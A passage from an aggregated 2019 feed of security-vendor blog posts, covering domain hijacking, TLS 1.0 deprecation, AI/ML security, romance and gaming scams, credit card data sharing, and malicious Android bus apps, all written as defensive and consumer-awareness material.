Verisign encourages registrants to research their registrar’s security offerings and to take advantage of the tools and services they offer. Techniques such as locking services offered by registrars and registries8, two-factor authentication, password strengthening, and other common security hygiene practices9 are all best practice security recommendations that Verisign encourages and promotes.

Additional security recommendations are available in the following ICANN SSAC reports:

  • SAC04010: “Measures to Protect Domain Name Registration Service Against Exploitation or Misuse”
  • SAC04411: “A Registrant’s Guide to Protecting Domain Name Registration Accounts”
  • SAC07412: “Best Practices for Preserving Security and Stability in the Credential Management Lifecycle”

1 https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html

2 https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/

3http://www.circleid.com/posts/20130722_how_registrants_can_reduce_the_threat_of_domain_hijacking/ 

4https://www.usenix.org/legacy/events/imc05/tech/full_papers/ramasubramanian/ramasubramanian_html/dns.html

5 https://www.internic.net/domain/root.zone

6 https://www.verisign.com/en_US/domain-names/dnssec/how-dnssec-works/index.xhtml

7 https://cyber.dhs.gov/ed/19-01/

8 https://www.verisign.com/en_US/channel-resources/domain-registry-products/registry-lock/index.xhtml

9https://www.markmonitor.com/download/checklist/MarkMonitor_Domain_Security_Best_Practices.pdf

10 https://www.icann.org/en/system/files/files/sac-040-en.pdf

11 https://www.icann.org/en/system/files/files/sac-044-en.pdf

12 https://www.icann.org/en/system/files/files/sac-074-en.pdf

The post Revisiting How Registrants Can Reduce the Threat of Domain Hijacking appeared first on Verisign Blog.

A week in security (February 4 – 8)

Last week on Malwarebytes Labs, we took a closer look at the technical and reputational challenges for Facebook as it tries to integrate secure messaging across Messenger, WhatsApp, and Instagram. We explored Google’s latest attempts to change how the public sees—literally—web browser URLs, gave some of our best tips on how to safely browse the Internet at work, and detailed a unique spam campaign involving ebooks, the Amazon Kindle web store and… John Wick? Yep.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (February 4 – 8) appeared first on Malwarebytes Labs.

Solving the TLS 1.0 problem

The use of Transport Layer Security (TLS) encryption for data in transit is a common way to help ensure the confidentiality and integrity of data transmitted between devices, such as a web server and a computer. However, in recent years older versions of the protocol have been shown to have vulnerabilities, and therefore their use should be deprecated.

We have been recommending the use of TLS 1.2 and above for some time. To help provide guidance, we are pleased to announce the release of the Solving the TLS 1.0 Problem, 2nd Edition white paper. The goal of this document is to provide the latest recommendations that can help remove technical blockers to disabling TLS 1.0 while at the same timeincreasing visibility intothe impact of this change to your own customers.Completing such investigations can help reduce thebusinessimpact of the next security vulnerability in TLS 1.0.

In the second edition update we added the following:

  • Updates covering all of the new products and features Microsoft has shipped since the first version of the white paper, including IIS custom logging fields for weak TLS detection, TLS 1.2 backports to legacy OSes, and more.
  • Introduction of the Office 365 Secure Score Customer Reporting Portal to help Office 365 tenant admins quantify their customers own weak TLS usage.
  • Much more detail on .NET recommendations and best practices to ensure the usage of TLS 1.2+.
  • Pointers to DevSkim rules for detection and prevention of TLS hardcoding.
  • Tips for using PowerShell with TLS 1.2.

Read the Solving the TLS 1.0 Problem, 2nd Edition white paper to learn more.

The post Solving the TLS 1.0 problem appeared first on Microsoft Secure.

Product showcase: Veriato Cerebral user & entity behavior analytics software

When it comes to identifying and stopping insider data security threats, actionable insights into people’s behaviors are invaluable. Employees involved in negative workplace events, contractors with access to critical systems and sensitive data, and departing employees all present elevated risks. Whether it’s a true insider exfiltrating data, or hackers leveraging compromised credentials to become an insider, behavior patterns can indicate both emerging and immediate risks to your security. Veriato Cerebral user & entity behavior analytics … More

The post Product showcase: Veriato Cerebral user & entity behavior analytics software appeared first on Help Net Security.

How can we improve adoption and ROI on security investments?

Traditionally, whenever employees are required to interact with security solutions, they push back because they don’t want their lives to be made more complicated with extra procedures and, essentially, clicks. Human behavior dictates that if there’s a tech roadblock, users will find a way around it to get their jobs done. In light of these work arounds, organizations often struggle to quantify how to reduce risk and improve compliance, which makes it harder to prove … More

The post How can we improve adoption and ROI on security investments? appeared first on Help Net Security.

Zero trust browsing: Protect your organization from its own users

To the casual observer, the cyberattack landscape is constantly shifting. In recent years, the threats and scams have evolved from Nigerian princes to stranded travelers, pop-ups warning of outdated software to ransomware, cryptojacking, phishing and spear phishing. Predictions for 2019 are full of dire warnings about the very-real explosion of phishing, backed by geometric increases in phishing sites as the number of malware sites drops. Just as 2018 predictions focused on cryptojacking and ransomware were … More

The post Zero trust browsing: Protect your organization from its own users appeared first on Help Net Security.

There’s a growing disconnect between data privacy expectations and reality

There is a growing disconnect between how companies capitalize on customer data and how consumers expect their data to be used, according to a global online survey commissioned by RSA Security. Consumer backlash in response to the numerous high-profile data breaches in recent years has exposed one of the hidden risks of digital transformation: loss of customer trust. According to the study, which surveyed more than 6,000 adults across France, Germany, the United Kingdom and … More

The post There’s a growing disconnect between data privacy expectations and reality appeared first on Help Net Security.

Average DDoS attack volumes grew by 194% in 12 months

The volume and complexity of DDoS attacks continued to grow in Europe during the final quarter of 2018, according to Link11. While Link11’s Security Operations Center (LSOC) registered 13,910 attacks in Q4 (12.7% down compared to Q3), the average attack volume grew by 8.7% to 5Gbps, and 59% of attacks used multiple attack vectors. Key findings of Link11’s Q4 DDoS report include: Average attack volumes grew by 194% in 12 months: In Q4 2018, average … More

The post Average DDoS attack volumes grew by 194% in 12 months appeared first on Help Net Security.

Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account

Online Dating ScamsIt’s hard to believe that as savvy as we’ve become about our tech, people are still getting catfished, scammed, and heartbroken in their pursuit of love online.

The dinner conversation between bystanders goes something like this: “How could anyone be so dumb? Seriously? If they are going to be that reckless and uninformed, then maybe they deserve what they got!”

Some friends and I recently had a similar conversation about online dating scams. I noticed, however, that one friend, Sarah*, wasn’t so eager to jump into the conversation. She shrunk back in the booth and quietly sipped her margarita. Only later did she share her story with me.

The power of love

A single mom in her late 40s, well-educated, and attractive, Sarah’s teenager had convinced her to join a dating site the year before. She was especially lonely after her divorce three years earlier, so she agreed to create a profile on a popular dating app. After a handful of dates fell flat, she found Scott. He was charismatic, kind. “We had an instant connection,” according to Sarah. They spent hours on the phone sharing their deepest secrets and even started imagining a future together. But after about three months, Scott fell on hard times. At first, he needed to borrow $400 to pay for airfare to visit a dying relative, which he paid back immediately. Over the next few months, the numbers grew to $1,000 for rent and $3,000 for a business venture.

Online Dating Scams

Before long, Sarah had loaned her new love over $8,500. When she pressed him to repay the money, Scott ghosted Sarah online, moved out of town, and she never saw him again. My friend didn’t share her story with many people. She didn’t report it. She was too embarrassed and humiliated and even became depressed following what she calls “the Scott scam.” Her trust in other people and in love itself has been obliterated.

Sarah’s story doesn’t just echo that of desperate, clueless people, or lonely older women. Scammers are targeting good people who still believe in and value love and companionship. The pursuit of love online extends to adults as well as teens.

Confidence Fraud

Law enforcement calls these kinds of online romance scams confidence fraud because scammers will take a considerable amount of time gaining the trust and confidence of their victims. They will appear empathetic and supportive as they gather personal information they can use over time to carry out their scam.

According to the Federal Bureau of Investigation (FBI) confidence fraud has jumped 20% in the past year despite reports and warnings — especially around this time of year.

The FBI’s Internet Crime Complaint Center (IC3) reports that romance scams top all other financial online crimes. In 2016, people reported almost 15,000 romance scams to IC3 (nearly 2,500 more than the previous year), with losses exceeding $230 million.

Tips for Safe Online Dating

Never send money. Be it a romantic relationship you’ve engaged with or a phishing email, no matter the sob story, do not send money to anyone online. If you do send money, put a loan agreement in place that is legally enforceable should one party default.

Suspicious behavior. If someone promises to meet you somewhere but keeps canceling or if he or she refuses to video chat, those are red flags. Technology means anyone from anywhere in the world can successfully maintain a scam.Online Dating Scams

Take things slow. If someone is pushing the pace of a relationship or too quick to declare love and talk about the future, pause and assess the situation.

Do a background check. Love is a powerful force and can easily cloud a person’s correct understanding of reality. If you dare to create a dating profile, make a deal with yourself that you will extend the same courage to doing a background check on someone.

Be a sleuth. Don’t be afraid to gather facts on someone you’ve met online. Simple steps such as Googling the person’s name or dropping their photo in Google’s Reverse Image Search will help you get a better understanding of a person. Have faith: Good, legitimate people do exist. However, if there’s anything dubious, it’s best to find it out earlier rather than later. Part of doing your homework is tracking down mutual friends and making inquiries about the person you are talking with online.

Keep your social profiles private. Experts agree that you should edit your online footprint before you start dating people you’ve met online. Making your Instagram, Twitter, and Facebook private will guard you against potential.

Never send racy photos. Some scammers gain the confidence of their victims with every intention of extorting them in the future. They will threaten to send any racy photos with your family, friends, or business associates. The best way to avoid this is to never, ever send racy photos to anyone.Online Dating Scams

Google yourself, restrict info. Google yourself to see if there are any digital breadcrumbs that give away your home address or phone number. If possible, delete or revise that info. Likewise, go through your social accounts and remove any personal information you’ve shared in the past. Digital stalking is a risk for people who date online so turn off GPS on your dating apps and make sure your profile information is vague. Even if you get comfortable online with others, never get too comfortable since apps have privacy loopholes that can easily be exploited by hackers.

Take solid precautions. Enlist at least one friend as your dating safety pal. This will be the person who knows where you are going, who you will be with, and the background on the person you are meeting. Ask that person to check in with you during the date and carry pepper spray or a taser for physical protection. Go the extra step and turn on your Friend Finder or a location app that allows safety friend to track your whereabouts during a date.

*Names have been changed

The post Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account appeared first on McAfee Blogs.

How Online Gamers Can Play It Safe

Online gaming has grown exponentially in recent years, and scammers have taken note. With the industry raking in over $100 billion dollars in 2017 alone[1], the opportunity to funnel some money off through fraud or theft has proven irresistible to the bad guys, leaving gamers at greater risk.

From malware and phishing scams, to phony game hacks, identity theft, and more, gamers of all stripes now face a minefield of obstacles online and in real life. So, if you’re going to play games, it’s best to play it safe.

Here’s what to look out for:

Dodgy Downloads

Gamers who play on their computer or mobile device need to watch out for dangerous links or malicious apps disguised as popular or “free” games. Hackers often use innocent-looking downloads to deliver viruses and spyware, or even sign you up for paid services, without your consent. In one prominent case, more than 2.6 million Android users downloaded fake Minecraft apps that allowed hackers to take control of their devices.

Researchers have even discovered a ransomware threat that targets gamers. TeslaCrypt was designed to encrypt game-play data until a ransom is paid. Originally distributed through a malicious website, it has since been circulating via spam.

And while it’s true that game consoles like PlayStation and Xbox aren’t as vulnerable to viruses, since they are closed systems, that doesn’t mean that their users don’t face other risks.

Social Scams

Players on any platform could wind up with malware, sent directly from other players via chat messages. Some scammers use social engineering tricks, like inviting other players to download “helpful” tools that turn out to be malware instead. When you consider that 62% of kids play games where they speak to others, the odds of a risky interaction with a stranger seems quite real.

Players of the Origin and Steam services, for instance, were targeted by hackers posing as other players, inviting them to play on their teams. Over chat message, they suggested the players download an “audio tool” that turned out to be a keystroke logger, aimed at stealing their access credentials for the game.

Other social scams include malicious YouTube videos or websites, offering game bonuses and currency, for free.

Another widespread social threat is account takeover, or ATO for short. This is when a scammer hacks a real account in order to post spammy links, and scam messages that appear to come from a trusted contact. Some accounts, for games like League of Legends, have even been stolen and sold online for money because they boasted a high level, or rare skins.

Phishing

Finally, be on the lookout for phishing websites, offering free games or bonuses, or phishy emails prompting you to login to your account, with a link leading to a copycat gaming site. Often, these are designed to steal your login credentials or distribute fake games that contain malware.

Players of the wildly popular Fortnite, for example, have been particularly targeted. The latest phishing scam is aimed at stealing the third-party sign-in tokens that allow cybercriminals to access a user’s account, and the payment details associated with it.

So now that you know about a little more about gaming threats, here’s how to win at playing it safe:

  1. Do Your Research—Before downloading any games from the Internet or app stores, make sure to read other users’ reviews first to see that they are safe. This also goes for sites that sell game hacks, credits, patches, or virtual assets typically used to gain rank within a game. Avoid illegal file-sharing sites and “free” downloads, since these are often peppered with malware. It’s always best to go for a safer, paid option from a reputable source.
  2. Play Undercover— Be very careful about sharing personal information, in both your profile information, and your chat messages. Private information, such as your full name, address, pet’s name, school, or work details, could be used to guess your account password clues, or even impersonate you. Consider playing under an alias.
  3. Be Suspicious—Since scammers use the social aspect of games to fool people, you need to keep your guard up when you receive messages from strangers, or even read reviews.
    Some YouTube and social media reviews are placed there to trick users into thinking that the game or asset is legitimate. Dig deep, and avoid looking for free hacks. Ask gamers you know in real life for recommendations that worked for them.
  4. Protect Yourself—Avoid using older versions of games, and make sure that games you do play are updated with patches and fixes. And if you think a gaming account may already have been compromised, change your passwords immediately to something unique and complex.Safeguard your computers and devices from known and emerging threats by investing in comprehensive security software, and keep yourself up-to-date on the latest scams.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

[1]According to The 2017 Year In Review Report by SuperData

The post How Online Gamers Can Play It Safe appeared first on McAfee Blogs.

Mild to medium volume expected for February 2019 Patch Tuesday

If you look at the recent Patch Tuesday lineups, we have seen the usual updates for the Microsoft Windows OS, browsers, and Office. In the last two months we have seen updates for .Net Framework and in the last four months we have seen updates for Exchange Server. For non-Microsoft updates we have a pre-notification from Adobe, but Oracle released their CPU in January and both Chrome and Firefox just released at the end of … More

The post Mild to medium volume expected for February 2019 Patch Tuesday appeared first on Help Net Security.

DevOps and DevSecOps developments to watch in 2019

Some predictions are more accurate than others. Last year, I was sure that serverless would finally overtake containers—but then 2018 turned out to be the year of Kubernetes. In the San Francisco Bay Area, you couldn’t throw a rock without hitting an engineer talking about Kubernetes (or cryptocurrency, but let’s not go there.) That’s not stopping me from offering a fresh batch of hot-off-the-press predictions about DevOps and DevSecOps for 2019. It’s finally the year … More

The post DevOps and DevSecOps developments to watch in 2019 appeared first on Help Net Security.

Infosec pros believe data isn’t secure in the cloud, despite desire for mass adoption

65 percent of infosecurity professionals would like to store object data in the cloud, but 47 percent either don’t believe or are not sure if data in the cloud is as secure as in their own data center, according to a study by Ponemon Institute. The study looks at perceptions around on-premise and cloud-based data storage technologies across 483 IT and IT security professionals familiar with the benefits of object storage technology. The primary reasons … More

The post Infosec pros believe data isn’t secure in the cloud, despite desire for mass adoption appeared first on Help Net Security.

Thousands Of Users Thrashed By Extremely Real-looking-Fake-Scans Scam



Thousands of users have encountered a severe threat from scammers who are employing cunning use of JavaScript and HTML codes by way of “Potentially Unwanted Applications”.

A major security researching organization uncovered a recent development in the scamming area where PUAs and POAs are being employed.

These scams could be categorized as tech-support scams which primarily work on scaring the victim into doing something unforeseen by the victim themselves.

After fake-calls, potentially unwanted applications have become quite common, but the latest twist is the shrewd usage of JavaScript and HTML code.

These codes specifically work on making the fake scans seem implausibly real, making it faster and easier for the scanners to fool their prey.

The well-known Norton Security applications are basically being stolen from the aforementioned organization.

These scams are in no way comparable to the basic and obvious anti-virus scams that are run on a common basis.

The scammers make the scan look so legit that it never occurs to the victim to question it at all.

There sure is an alert which pops up. The users think of it to be as one from an anti-malware app, when it’s actually coming from a web browser.

The way the scanners go around is that they offer an infection to be paired up by way of a 10-second scan. This obviously lures the users in swiftly.

A web-based dashboard is being implemented by the scammers to manage and monitor all the scams that are happening.

Thousands of dollars have been wrested from the victims that too by using overtly basic, fake looking contrivances.

Last three months of 2018 had been really busy for Symantec, the aforementioned organization, as they’ve blocked PUA installations around 89 million times.

There are several points that have to be kept in mind, for instance, no pop up is capable of analyzing the hard drive and the real files on it.

No anti-malware supplication would ask the user to download a separate application for the update process.

The best way to get saved from this kind of threat is looking out for an alert that mentions the remaining days left in the so called “subscription”.

Microsoft Secure: Securing the future of AI and machine learning at Microsoft

Artificial intelligence (AI) and machine learning are making a big impact on how people work, socialize, and live their lives. As consumption of products and services built around AI and machine learning increases, specialized actions must be undertaken to safeguard not only your customers and their data, but also to protect your AI and algorithms from abuse, trolling, and extraction.

We are pleased to announce the release of a research paper, Securing the Future of Artificial Intelligence and Machine Learning at Microsoft, focused on net-new security engineering challenges in the AI and machine learning space, with a strong focus on protecting algorithms, data, and services. This content was developed in partnership with Microsofts AI and Research group.Its referenced in The Future Computed: Artificial Intelligence and its role in society by Brad Smith and Harry Shum, as well as cited in the Responsible bots: 10 guidelines for developers of conversational AI.

This document focuses entirely on security engineering issues unique to the AI and machine learning space, but due to the expansive nature of the InfoSec domain, its understood that issues and findings discussed here will overlap to a degree with the domains of privacy and ethics. As this document highlights challenges of strategic importance to the tech industry, the target audience for this document is security engineering leadership industry-wide.

Our early findings suggest that:

  1. Secure development and operations foundations must incorporate the concepts of Resilience and Discretion when protecting AI and the data under its control.
  • AI-specific pivots are required in many traditional security domains such as Authentication, Authorization, Input Validation, and Denial of Service mitigation.
  • Without investments in these areas, AI/machine learning services will continue to fight an uphill battle against adversaries of all skill levels.
  1. Machine learning models are largely unable to discern between malicious input and benign anomalous data. A significant source of training data is derived from un-curated, unmoderated public datasets that may be open to third-party contributions.
  • Attackers dont need to compromise datasets when they are free to contribute to them. Such dataset poisoning attacks can go unnoticed while model performance inexplicably degrades.
  • Over time, low-confidence malicious data becomes high-confidence trusted data, provided that the data structure/formatting remains correct and the quantity of malicious data points is sufficiently high.
  1. Given the great number of layers of hidden classifiers/neurons that can be leveraged in a deep learning model, too much trust is placed on the output of AI/machine learning decision-making processes and algorithms without a critical understanding of how these decisions were reached.
  • AI/machine learning is increasingly used in support of high-value decision-making processes in medicine and other industries where the wrong decision may result in serious injury or death.
  • AI must have built-in forensic capabilities. This enables enterprises to provide customers with transparency and accountability of their AI, ensuring its actions are not only verifiably correct but also legally defensible.
  • When combined with data provenance/lineage tools, these capabilities can also function as an early form of AI intrusion detection, allowing engineers to determine the exact point in time that a decision was made by a classifier, what data influenced it, and whether or not that data was trustworthy.

Our goal is to bring awareness and energy to the issues highlighted in this paper while driving new research investigations and product security investments across Microsoft.Read the Securing the Future of Artificial Intelligence and Machine Learning at Microsoft paper to learn more.

The post Securing the future of AI and machine learning at Microsoft appeared first on Microsoft Secure.



Microsoft Secure

Securing the future of AI and machine learning at Microsoft

Artificial intelligence (AI) and machine learning are making a big impact on how people work, socialize, and live their lives. As consumption of products and services built around AI and machine learning increases, specialized actions must be undertaken to safeguard not only your customers and their data, but also to protect your AI and algorithms from abuse, trolling, and extraction.

We are pleased to announce the release of a research paper, Securing the Future of Artificial Intelligence and Machine Learning at Microsoft, focused on net-new security engineering challenges in the AI and machine learning space, with a strong focus on protecting algorithms, data, and services. This content was developed in partnership with Microsofts AI and Research group.Its referenced in The Future Computed: Artificial Intelligence and its role in society by Brad Smith and Harry Shum, as well as cited in the Responsible bots: 10 guidelines for developers of conversational AI.

This document focuses entirely on security engineering issues unique to the AI and machine learning space, but due to the expansive nature of the InfoSec domain, its understood that issues and findings discussed here will overlap to a degree with the domains of privacy and ethics. As this document highlights challenges of strategic importance to the tech industry, the target audience for this document is security engineering leadership industry-wide.

Our early findings suggest that:

  1. Secure development and operations foundations must incorporate the concepts of Resilience and Discretion when protecting AI and the data under its control.
  • AI-specific pivots are required in many traditional security domains such as Authentication, Authorization, Input Validation, and Denial of Service mitigation.
  • Without investments in these areas, AI/machine learning services will continue to fight an uphill battle against adversaries of all skill levels.
  1. Machine learning models are largely unable to discern between malicious input and benign anomalous data. A significant source of training data is derived from un-curated, unmoderated public datasets that may be open to third-party contributions.
  • Attackers dont need to compromise datasets when they are free to contribute to them. Such dataset poisoning attacks can go unnoticed while model performance inexplicably degrades.
  • Over time, low-confidence malicious data becomes high-confidence trusted data, provided that the data structure/formatting remains correct and the quantity of malicious data points is sufficiently high.
  1. Given the great number of layers of hidden classifiers/neurons that can be leveraged in a deep learning model, too much trust is placed on the output of AI/machine learning decision-making processes and algorithms without a critical understanding of how these decisions were reached.
  • AI/machine learning is increasingly used in support of high-value decision-making processes in medicine and other industries where the wrong decision may result in serious injury or death.
  • AI must have built-in forensic capabilities. This enables enterprises to provide customers with transparency and accountability of their AI, ensuring its actions are not only verifiably correct but also legally defensible.
  • When combined with data provenance/lineage tools, these capabilities can also function as an early form of AI intrusion detection, allowing engineers to determine the exact point in time that a decision was made by a classifier, what data influenced it, and whether or not that data was trustworthy.

Our goal is to bring awareness and energy to the issues highlighted in this paper while driving new research investigations and product security investments across Microsoft.Read the Securing the Future of Artificial Intelligence and Machine Learning at Microsoft paper to learn more.

The post Securing the future of AI and machine learning at Microsoft appeared first on Microsoft Secure.

Government, Private Sector Unprepared for 21st Century Cyber Warfare

U.S. government agencies and businesses are largely unprepared for a major cyber attack from state-sponsored actors, and must prepare now, according to a report by key governmental-focused think tanks.

The post Government, Private Sector Unprepared for 21st Century Cyber Warfare appeared first on The Security Ledger.

Related Stories

How today’s workforce stays secure and what apps it prefers

User-focused security apps KnowBe4, LastPass, and Proofpoint dominate the list of fastest growing apps within enterprises, according to Okta. “KnowBe4 in particular is fulfilling a clear market need: less than half of survey respondents have ever participated in cybersecurity training at work,” the company noted in its latest Businesses @ Work report, which is based on data collected between November 1, 2017 to October 31, 2018 from its Okta Integration Network. Most popular apps Microsoft … More

The post How today’s workforce stays secure and what apps it prefers appeared first on Help Net Security.

How much does your credit card issuer know about you?

Cash is slowly but steadily becoming one of the least popular payment methods in the developed countries. Here in the US, the amount of consumer purchases done with plastic cards is approximately ten times higher when compared to cash payments. Consumers are giving up on checks and cash handling and are opting in for the convenience, protection, and rewards often offered by the issuing banks.

Very often credit card companies manage to attract the attention of clients by offering them comprehensive reward points systems, sign-up bonuses, and perks such as early access to concert tickets and invitations for special events organized for clients of a particular network – VISA, MasterCard, American Express, or Discovery. Credit cards enable cardholders to purchase goods and services – the transactions are based on the cardholder’s promise to pay back for the borrowed amounts as well as other additional charges such as interest and monthly services fees.

Credit card issuers are in possession of all sorts of personal information that includes current and previous addresses, income, full name, and DOB. There is no harm there; it’s normal for businesses to ask for personal information so they can verify your identity and determine your trustworthiness. However, personal information is not the only valuable thing that credit card holders are giving away when they start a relationship with a credit card company.

While issuing banks are known to profit out of fees associated with the usage of credit cards; consumers are giving up vast amounts of personal information that might be used by the credit card companies and may end up shared with third parties. Such information includes your spending habits, shopping patterns, preferences, life secrets, and in some cases, even your location.

What information do you give to credit card issuers and how do credit card companies keep track of your buying habits?

Location

If you are using mobile banking the chances that your credit card issuer is aware of your location at all times is high. The information collected could be used for both marketing and security purposes. If you tend to spend a lot of money on dining, you might be offered a new credit card that gives you even more rewards for money spend on a night out. Sharing your location with your credit card issuer helps banks battle fraud too – your credit card issuer would not be concerned if they see an international transaction if you tend to travel a lot.

Spending habits and patterns

Credit card issuers can learn a lot about you from your spending habits and patterns. If you end up spending a lot of money on international trips they might use the information to suggest travel cards with no foreign transaction fees. Or guide you to an affiliated travel website so you can spend more using the same card. Yearly, monthly, and weekly patterns show banks what your day looks like and gives them an idea of what products and services you may need.

Trustworthiness

Bank issuers use your transaction history to decide on whether you are trustworthy and reliable. You may qualify for a credit card limit increase if your income and debt ratios are on an acceptable rate, all your payments are on time, and you pay a regular monthly fee to a luxury car maker. Banks love people who pay their bills on time! It won’t be a surprise if you get offered better credit card conditions if your credit score keeps growing over the years. Banks may even disregard lousy credit if you are a long term client and they see a pattern that they like – you are considered a valued customer as long as you use their card and pay your bills on time.

How do they use the data?

At the age of big data, your card transaction history tells a lot about yourself and how you live your life. So it is not a surprise that many organizations would want access to such data. Life insurance companies might give more favorable quotes to people who go to the gym four times a week, do not spend money on tobacco nor liqueur and buy organic. So you can imagine that apart of providing you with better solutions that suit your lifestyle, card issuers often partner up with data mining companies whose goal is to make you spend more money.

Banks also share transactional data with third parties such as data brokers, that work with advertisers and marketers, who are always ready to target you with what they believe are relevant marketing campaigns of goods and services that you may be willing to purchase. If you do not want your data analyzed, you can opt out you VISA cards here, and MasterCard cards here. The opt requests last only five years so if you want to maintain your opt-out choice, you have to manually enter the card details of every new or replacement card you receive.

Is this enough to be secure and to prevent your data from being spread around?

Not really, the best way to know what data you are sharing with your credit card issuer is to read the Terms & Conditions agreement they give you on sign up. Having antivirus software installed on all your connected devices also helps – being protected will prevent cybercriminals the ability to obtain the missing piece about you from the constant data leaks that have been happening over the last decade.

Download Panda FREE VPN

The post How much does your credit card issuer know about you? appeared first on Panda Security Mediacenter.

What do successful pentesting attacks have in common?

In external penetration testing undertaken for corporate clients in industrial, financial, and transport verticals in 2018, Positive Technologies found that, at the vast majority of companies, there were multiple vectors in which an attacker could reach the internal network. Full control of infrastructure was obtained on all tested systems in internal pentesting. In addition, the testers obtained access to critical resources such as ICS equipment, SWIFT transfers, and ATM management. These statistics are based on … More

The post What do successful pentesting attacks have in common? appeared first on Help Net Security.

Lookalike domains: Artificial intelligence may come to the rescue

In the world of network security, hackers often use lookalike domains to trick users to unintended and unwanted web sites, to deliver malicious software into or to send data out of victim’s network, taking advantage of the fact that it’s hard to tell the difference between those domains and the targets they look alike. For example, in a recent card skimming malware attack, domain google-analyitics.org was used to receive collected payment card data (there is … More

The post Lookalike domains: Artificial intelligence may come to the rescue appeared first on Help Net Security.

5 reasons why asset management is a hot topic in 2019

Sometimes buzzwords are good predictors of what organizations see as priorities in a given year. If you surveyed both the revenue-generating and security functions of enterprises in 2019, you would hear two terms often repeated: digital transformation and zero trust. While the two terms may seem at linguistic odds, the idea that organizations must embrace the digital age to drive growth and operate more efficiently while simultaneously maintaining adequate information security makes sense. It won’t … More

The post 5 reasons why asset management is a hot topic in 2019 appeared first on Help Net Security.

The impact of cyber-enabled economic warfare escalation

The results of a tabletop exercise on cyber-enabled economic warfare find that when a large-scale destructive cyberattack occurs, the United States and the private sector must already have in place the resources and methods to share information in order to mitigate the attack and recover from it quickly, according to a joint report by the Foundation for Defense of Democracies (FDD) and The Chertoff Group. The exercise, which featured former senior government officials and private … More

The post The impact of cyber-enabled economic warfare escalation appeared first on Help Net Security.

70 real-life hackers and cybersecurity practitioners share their personal insights

Entering the information security industry can be a formidable undertaking and renowned professionals often seem larger than life and unapproachable (even though most are on Twitter and their email address is public). Luckily for us all, Marcus J. Carey and Jennifer Jin have the ear of some of the biggest names in the field and have decided to generously share that access. Their book Tribe of Hackers: Cybersecurity Advice from the Best Hackers in the … More

The post 70 real-life hackers and cybersecurity practitioners share their personal insights appeared first on Help Net Security.

Facebook’s Plans to Merge Messaging Platforms: What This Means for Online Safety

Integration: it seems to be all the rage. As technology becomes more sophisticated, we sprint to incorporate these new innovations into our everyday lives. But as we celebrate Safer Internet Day, one can’t help but wonder, is all integration good when it comes to information shared online? Major privacy concerns have been raised surrounding Facebook’s recent plans to merge Messenger, WhatsApp, and Instagram. This integration will allow cross-messaging between the three platforms (which will all still operate as standalone apps), so users could talk to their Messenger-only friends without leaving WhatsApp.

While Facebook’s plans to merge the messaging platforms are not yet finalized, the company is in the process of rebuilding the underlying infrastructure so that users who might utilize only one of the apps will be able to communicate with others within the company’s ecosystem. Facebook plans to include end-to-end encryption for the apps, ensuring that only the participants of a conversation can view the messages being sent. By allowing each app to speak to one another across platforms, Facebook hopes users become more engaged and use this as their primary messaging service.

But Facebook’s messaging changes have greater implications for online safety as consumers become more protective of their data. For example, WhatsApp only requires a phone number to sign up for the app while Facebook asks users to verify their identities. Will this force more data to be shared with WhatsApp, or will its encryption become less secure? While nothing has been finalized, it’s important for users to think about how the information they share online could be affected by this merge.

Although the internet has paved the way for advancements in social media and technology in general, users need to make sure they’re aware of the potential risks involved. And while this merge hasn’t happened yet, Safer Internet Day helps remind us to make good choices when it comes to browsing online. Following these tips can help keep you and your data safe and secure:

  • Get selective about what you share. Although social media is a great way to keep your friends and family in the loop on your daily life, be conservative about the information you put on the internet. Additionally, be cautious of what you send through messaging platforms, especially when it comes to your personally identifiable information.
  • Update your privacy settings. To make sure that you’re sharing your status with just your intended audience, check your privacy settings. Choose which apps you wish to share your location with and turn your profiles to private if you don’t want all users to have access to your information.
  • Keep your apps up-to-date. Keeping your social media apps updated can prevent exposure to threats brought on by software bugs. Turn on automatic updates so you always have the latest security patches, and make sure that your security software is set to run regular scans.
  • Click with caution. Cybercriminals can leverage social media messaging to spread phishing links. Don’t interact with users or messages that seem suspicious and keep your guard up by blocking unfamiliar users who try to send you sketchy content.
  • Stay secure while you browse online. Security solutions like McAfee WebAdvisor can help block malware and phishing sites if you accidentally click on a malicious link. This can help protect you from potential threats when you access your social channels from a desktop or laptop.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Facebook’s Plans to Merge Messaging Platforms: What This Means for Online Safety appeared first on McAfee Blogs.

Why vaporworms might be the scourge of 2019

Not too long ago, the WatchGuard Threat Lab predicted the emergence of vaporworms as a major new cyber threat that will affect organizations of all sizes in 2019. We coined the term to describe a new breed of fileless malware with self-propagating, wormlike properties. At the time of the initial prediction, our team was fairly sure this idea was more than conjecture, but now the advent of the vaporworm in 2019 seems to be an … More

The post Why vaporworms might be the scourge of 2019 appeared first on Help Net Security.

AI won’t solve all of our cybersecurity problems

AI is already supporting businesses with tasks ranging from determining marketing strategies, to driverless cars, to providing personalized film and music recommendations. And its use is expected to grow even further in the coming years. In fact, IDC found that spending on cognitive and AI systems will reach $77.6 billion in 2022, more than three times the $24.0 billion forecast for 2018. But the question remains – can businesses expect AI adoption to effectively protect … More

The post AI won’t solve all of our cybersecurity problems appeared first on Help Net Security.

Cybersecurity Documentation: The Best Defense Is a Good Offense

Most people do not regard their cybersecurity and privacy documentation as a proactive security measure. On the contrary, many oftentimes view documentation as a passive effort that offers little protection to a company, generally an afterthought that must be addressed to appease compliance efforts. Where documentation may get some much-needed attention is through Ohio’s recent […]… Read More

The post Cybersecurity Documentation: The Best Defense Is a Good Offense appeared first on The State of Security.

MalBus: Popular South Korean Bus App Series in Google Play Found Dropping Malware After 5 Years of Development

McAfee’s Mobile Research team recently learned of a new malicious Android application masquerading as a plugin for a transportation application series developed by a South Korean developer. The series provides a range of information for each region of South Korea, such as bus stop locations, bus arrival times and so on. There are a total of four apps in the series, with three of them available from Google Play since 2013 and the other from around 2017. Currently, all four apps have been removed from Google Play while the fake plugin itself was never uploaded to the store. While analyzing the fake plugin, we were looking for initial downloaders and additional payloads – we discovered one specific version of each app in the series (uploaded at the same date) which was dropping malware onto the devices on which they were installed, explaining their removal from Google Play after 5 years of development.

Figure 1. Cached Google Play page of Daegu Bus application, one of the apps in series

